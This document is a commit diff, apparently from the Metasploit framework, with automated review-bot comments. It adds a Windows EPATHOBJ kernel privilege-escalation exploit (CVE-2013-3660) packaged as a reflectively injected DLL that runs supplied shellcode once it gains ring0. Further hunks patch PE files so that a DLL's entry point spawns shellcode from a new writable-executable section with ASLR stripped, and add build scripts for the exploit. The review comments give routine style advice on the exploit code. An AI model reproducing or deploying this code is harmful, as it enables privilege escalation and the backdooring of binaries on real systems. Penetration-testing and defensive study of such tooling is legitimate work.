static HANDLE Mutex; static HANDLE Mutex;
static DWORD ComplexPathFinished = 0; static DWORD ComplexPathFinished = 0;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK // Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001 #define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002 #define PD_ENDSUBPATH 0x00000002
@ -509,16 +495,15 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid; PULONG TargetPid;
PVOID *PsInitialSystemProcess; PVOID *PsInitialSystemProcess;
VOID elevator_complex_path();
//#define DEBUGTRACE 1 //#define DEBUGTRACE 1
#ifdef DEBUGTRACE // Log levels.
#define dprintf(...) real_dprintf(__VA_ARGS__) typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#else
#define dprintf(...) do{}while(0);
#endif
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...);
#define dprintf(...) real_dprintf(__VA_ARGS__)
static void real_dprintf(char *format, ...) { static void real_dprintf(char *format, ...) {
va_list args; va_list args;
char buffer[1024]; char buffer[1024];
@ -527,3 +512,7 @@ static void real_dprintf(char *format, ...) {
strcat_s(buffer, sizeof(buffer), "\r\n"); strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer); OutputDebugStringA(buffer);
} }
#else
#define dprintf(...)
#define LogMessage(...)
#endif
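Review bot: With `<windows.h>`, `<stdarg.h>` and `<ntstatus.h>` no longer included in this header, the `real_dprintf` body kept in the last hunk (`va_list`, `strcat_s`, `OutputDebugStringA`) only compiles when ComplexPath.h is included after something that has already pulled in the Windows headers — in this commit that is the `#include ".../ReflectiveLoader.c"` placed ahead of it in ReflectiveDll.c — so the header now carries an undocumented include-order dependency; add `// Requires <windows.h> and <stdarg.h> to be included first (ReflectiveDll.c pulls them in via ReflectiveLoader.c).` at the top of the first hunk. The `WIN32_NO_STATUS` define/undef pair left around `<stdio.h>` appears to have existed only so the now-removed `#include <ntstatus.h>` could coexist with windows.h; with that include gone it looks vestigial and should either be dropped or get a one-line comment saying why it stays. Since `DEBUGTRACE` remains commented out, both `dprintf` and `LogMessage` expand to nothing in shipped builds and every diagnostic string in the exploit is compiled away, which is presumably intended for an injected DLL but worth stating next to the `#else` so nobody "fixes" it. `real_dprintf` begins outside the final hunk, and the `#ifdef WIN32_NO_STATUS` guard that opens the first hunk starts above it.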


@ -1,15 +1,15 @@
//===============================================================================================// //===============================================================================================//
// This is a stub for the actuall functionality of the DLL. // This is a stub for the actual functionality of the DLL.
//===============================================================================================// //===============================================================================================//
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
//===============================================================================================//
#include "ReflectiveLoader.h"
#include "ComplexPath.h" #include "ComplexPath.h"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
// //
// -------------------------------------------------- // --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
} }
} }
VOID elevator_complex_path() /*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
VOID elevator_complex_path(LPVOID lpPayload)
{ {
HANDLE Thread; HANDLE Thread;
HDC Device; HDC Device;
@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n" "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n" "\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n"); "\n");
if (lpPayload == NULL) {
LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
return;
}
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile"); NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation"); NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL); Mutex = CreateMutex(NULL, FALSE, NULL);
@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require. // Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName); KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable. // Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize) HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is // I need to map at least two pages to guarantee the whole structure is
// available. // available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1), while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2, PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) { PAGE_EXECUTE_READWRITE)) {
@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) { if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished); LogMessage(L_INFO, "Success...", ComplexPathFinished);
//ExitProcess(0); CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return; return;
} }
@ -756,7 +775,8 @@ VOID elevator_complex_path()
} }
// A quick logging routine for debug messages. // A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...) #ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{ {
CHAR Buffer[1024] = {0}; CHAR Buffer[1024] = {0};
va_list Args; va_list Args;
@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout); //fflush(stdout);
//flush(stderr); //flush(stderr);
return TRUE;
} }
extern HINSTANCE hAppInstance; #else
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) #define LogMessage(...)
#endif
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{ {
BOOL bReturnValue = TRUE; BOOL bReturnValue = TRUE;
switch( dwReason ) dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
{ switch (dwReason)
case DLL_QUERY_HMODULE: {
if( lpReserved != NULL ) case DLL_QUERY_HMODULE:
*(HMODULE *)lpReserved = hAppInstance; hAppInstance = hinstDLL;
hAppInstance = hinstDLL; dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
elevator_complex_path(); if (lpReserved != NULL)
break; {
case DLL_PROCESS_ATTACH: *(HMODULE *)lpReserved = hAppInstance;
hAppInstance = hinstDLL; }
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH: hAppInstance = hinstDLL;
case DLL_THREAD_DETACH: dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
break; elevator_complex_path(lpReserved);
} break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue; return bReturnValue;
} }


@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
<RootNamespace>ppr_flatten_rec</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>


@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
</Project>


@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT% msbuild.exe make.msbuild /target:%PLAT%
POPD POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6% SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt% echo Finished %ldt%
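Review bot: The new CVE-2013-3660 block is skipped silently whenever the preceding msbuild left a non-zero ERRORLEVEL, because the IF wraps the whole block with no ELSE branch and no output, so a missing ppr_flatten_rec DLL in data/exploits will be hard to trace back to this script. Adding `) ELSE (` / `ECHO "Skipping CVE-2013-3660: previous build failed"` keeps the conditional behaviour but leaves a trace in the build log. Whether the other build steps in this file use the same guard is not visible from the hunk.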


@ -16,11 +16,15 @@ module Buffer
# #
# Serializes a buffer to a provided format. The formats supported are raw, # Serializes a buffer to a provided format. The formats supported are raw,
# ruby, perl, bash, c, js_be, js_le, java and psh # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
# #
def self.transform(buf, fmt = "ruby") def self.transform(buf, fmt = "ruby")
case fmt case fmt
when 'raw' when 'raw'
when 'num'
buf = Rex::Text.to_num(buf)
when 'dword', 'dw'
buf = Rex::Text.to_dword(buf)
when 'python', 'py' when 'python', 'py'
buf = Rex::Text.to_python(buf) buf = Rex::Text.to_python(buf)
when 'ruby', 'rb' when 'ruby', 'rb'
@ -54,11 +58,13 @@ module Buffer
# #
# Creates a comment using the supplied format. The formats supported are # Creates a comment using the supplied format. The formats supported are
# raw, ruby, perl, bash, js_be, js_le, c, and java. # raw, ruby, python, perl, bash, js_be, js_le, c, and java.
# #
def self.comment(buf, fmt = "ruby") def self.comment(buf, fmt = "ruby")
case fmt case fmt
when 'raw' when 'raw'
when 'num', 'dword', 'dw'
buf = Rex::Text.to_js_comment(buf)
when 'ruby', 'rb', 'python', 'py' when 'ruby', 'rb', 'python', 'py'
buf = Rex::Text.to_ruby_comment(buf) buf = Rex::Text.to_ruby_comment(buf)
when 'perl', 'pl' when 'perl', 'pl'
@ -84,19 +90,28 @@ module Buffer
# Returns the list of supported formats # Returns the list of supported formats
# #
def self.transform_formats def self.transform_formats
['raw', [
'ruby','rb', 'bash',
'perl','pl', 'c',
'bash','sh', 'csharp',
'c', 'dw',
'csharp', 'dword',
'js_be', 'java',
'js_le', 'js_be',
'java', 'js_le',
'python','py', 'num',
'powershell','ps1', 'perl',
'vbscript', 'pl',
'vbapplication' 'powershell',
'ps1',
'py',
'python',
'raw',
'rb',
'ruby',
'sh',
'vbapplication',
'vbscript'
] ]
end end
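Review bot: The header comment on `self.comment` was updated to mention python but not the new `num`, `dword` and `dw` formats it now handles, so the two doc comments in this hunk disagree about what is supported; I would change it to `# raw, num, dword, ruby, python, perl, bash, js_be, js_le, c, and java.`. Separately, `Rex::Text.to_num` and `to_dword` both accept a `wrap` argument but `transform` never passes one, so callers of `transform` cannot influence line wrapping for these formats the way they presumably expect — worth either plumbing the option through or noting the fixed width in the comment.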


@ -31,14 +31,12 @@ module Exe
def create_thread_stub def create_thread_stub
<<-EOS <<-EOS
hook_entrypoint:
pushad pushad
push hook_libname push hook_libname
call [iat_LoadLibraryA] call [iat_LoadLibraryA]
push hook_funcname push hook_funcname
push eax push eax
call [iat_GetProcAddress] call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook] lea edx, [thread_hook]
push 0 push 0
push 0 push 0
@ -68,8 +66,9 @@ module Exe
return asm return asm
end end
def payload_stub def payload_stub(prefix)
asm = create_thread_stub asm = "hook_entrypoint:\n#{prefix}\n"
asm << create_thread_stub
asm << payload_as_asm asm << payload_as_asm
shellcode = Metasm::Shellcode.assemble(processor, asm) shellcode = Metasm::Shellcode.assemble(processor, asm)
shellcode.encoded shellcode.encoded
@ -85,14 +84,37 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = ''
if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode
if pe.optheader.entrypoint == 0
prefix = "cmp [esp + 8], 1
jz spawncode
entrypoint:
xor eax, eax
inc eax
ret 0x0c
spawncode:"
else
# there is an entry point, we'll need to go to it after we bail or spawn shellcode
# if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
prefix = "cmp [esp + 8], 1
jnz entrypoint"
end
end
# Generate a new code section set to RWX with our payload in it # Generate a new code section set to RWX with our payload in it
s = Metasm::PE::Section.new s = Metasm::PE::Section.new
s.name = '.text' s.name = '.text'
s.encoded = payload_stub s.encoded = payload_stub prefix
s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE] s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
# Tell our section where the original entrypoint was # Tell our section where the original entrypoint was
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint) if pe.optheader.entrypoint != 0
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
end
pe.sections << s pe.sections << s
pe.invalidate_header pe.invalidate_header
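Review bot: The no-entry-point branch of the DLL prefix (`cmp [esp + 8], 1` … `ret 0x0c`) has no comment explaining what it tests or returns, while the else branch does, and the magic values are easy to misread. I would annotate the assembly inline with `; [esp+8] is fdwReason, 1 == DLL_PROCESS_ATTACH` on the cmp and `; return TRUE from a stdcall DllMain(hinst, reason, reserved): 3 args = 12 bytes` on the ret. Since `payload_stub` now interpolates `prefix` verbatim into the assembler source, a one-line comment on its parameter stating that it must be valid Metasm assembly (or empty) would also help the next caller. Note that `pe.optheader.dll_characts.delete("DYNAMIC_BASE")` means every patched binary loses ASLR, which the existing comment justifies but which is worth surfacing to users of this injector.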


@ -45,7 +45,8 @@ class Msf::Module::Author
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com', 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com' 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
} }
# #


@ -102,8 +102,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
elsif (in_ctx_id == 'MSB') elsif (in_ctx_id == 'MSB')
self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx' self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx'
elsif (in_ctx_id == 'MIL')
self.site = 'http://milw0rm.com/metasploit/' + in_ctx_val.to_s
elsif (in_ctx_id == 'EDB') elsif (in_ctx_id == 'EDB')
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
elsif (in_ctx_id == 'WVE') elsif (in_ctx_id == 'WVE')


@ -1,7 +1,7 @@
# -*- coding: binary -*- # -*- coding: binary -*-
require 'msf/core' require 'msf/core'
require 'rex/peparsey' require 'msf/core/reflective_dll_loader'
module Msf module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject module Payload::Windows::ReflectiveDllInject
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows include Msf::Payload::Windows
def initialize(info = {}) def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject
'Name' => 'Reflective DLL Injection', 'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader', 'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ], 'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ], 'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'PayloadCompat' => 'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject
end end
def stage_payload(target_id=nil) def stage_payload(target_id=nil)
dll = "" # Exceptions will be thrown by the mixin if there are issues.
offset = 0 dll, offset = load_rdi_dll(library_path)
begin
File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
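Review bot: `stage_payload` changes its failure contract here: the removed `rescue` printed the error and returned `nil`, whereas `load_rdi_dll` raises on a missing file, an unparsable PE or a DLL without a ReflectiveLoader export, so the exception now propagates to whoever calls `stage_payload`. The new comment acknowledges this, but callers are not visible in the hunk; if they relied on the nil return, either keep a `rescue => e` / `print_error(...)` / `return` at this level or document the raise in the method's comment. The same applies to `stage_payload` in the x64 variant later in this commit. The rest of `stage_payload` continues outside the hunk.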


@ -1,7 +1,7 @@
# -*- coding: binary -*- # -*- coding: binary -*-
require 'msf/core' require 'msf/core'
require 'rex/peparsey' require 'msf/core/reflective_dll_loader'
module Msf module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject_x64 module Payload::Windows::ReflectiveDllInject_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows include Msf::Payload::Windows
def initialize(info = {}) def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject_x64
'Name' => 'Reflective DLL Injection', 'Name' => 'Reflective DLL Injection',
